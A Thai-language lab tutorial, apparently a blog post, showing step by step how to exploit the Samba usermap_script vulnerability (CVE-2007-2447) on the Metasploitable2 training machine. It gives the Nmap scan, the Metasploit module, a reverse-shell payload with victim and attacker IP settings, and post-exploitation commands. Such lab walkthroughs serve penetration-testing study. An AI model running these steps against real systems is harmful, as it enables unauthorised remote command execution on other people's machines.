How to exploit SAMBA, usermap_script (CVE-2007-2447) – Metasploitable2

บทนำ (Overview)

บทความนี้นำเสนอวิธีการยึดช่องโหว่ของ “SAMBA” เวอร์ชัน “3.0.0” (smbd) ที่อนุญาติให้สามารถควบคุมระยะไกลผ่านคำสั่งต่าง ๆ ได้ (remote execution) สามารถศึกษารายละเอียดเพิ่มเติมได้ที่ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447

ขั้นตอน (Steps)

  1. ให้ตรวจสอบหมายเลข “Port” ที่ให้บริการ ของเครื่องเป้าหมายโดยใช้ “Nmap” ดังนี้
    nmap -A -v 192.168.1.58
    
  2. ตรวจสอบ “Port”  และ “Version” ของ “SAMBA” จากตัวอย่างคือ
    139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    
  3. ใช้คำสั่ง “msfconsole”  เพื่อใช้งาน “Metasploit”
    msfconsole
    
  4. ให้ใช้คำสั่งค้นหาตัว “usermap_script” ดังกล่าว
    search usermap_script
    

    metasploitable2-samba01

  5. เมื่อเจอ “Module” ดังกล่าวให้เรียกใช้โดยใช้คำสั่ง “use”
    use exploit/multi/samba/usermap_script
    
  6. จากนั้นเลือก “metasploit payload” โดยที่ “Payload” คือ ชิ้นส่วนของโปรแกรมที่ทำให้เราสามารถควบคุมระบบคอมพิวเตอร์ภายหลังจากที่ช่องโหว่ถูกยึดแล้ว (Exploited) ซึ่ง “Payload” ดังกล่าวจากถูกส่งไปยังเครื่องเป้าหมายโดย “Exploit”
    show payloads
    set payload cmd/unix/reverse
    

    metasploitable2-samba02

  7. ตั้งค่า “Parameter” ต่าง ๆ ดังนี้
    //แสดง parameter ที่ต้องตั้งค่า
    show options
    //IP เหยื่อ
    set RHOST 192.168.1.58
    //IP ผู้โจมตี
    set LHOST 192.168.1.57
    //Port เป้าหมาย
    set RPORT 445
    

    metasploitable2-samba03

  8. เมื่อตั้งค่าเสร็จทดลองใช้คำสั่ง “exploit” ถ้าสำเร็จเราสามารถใช้ “command” ต่าง ๆ บนเครื่องเป้าหมายได้ดังนี้
    //คำสั่ง exploit
    exploit
    
    //คำสั่งบนเครื่องเป้าหมาย
    hostname
    uname -a
    whoami
    

    metasploitable2-samba04

 

ใส่ความเห็น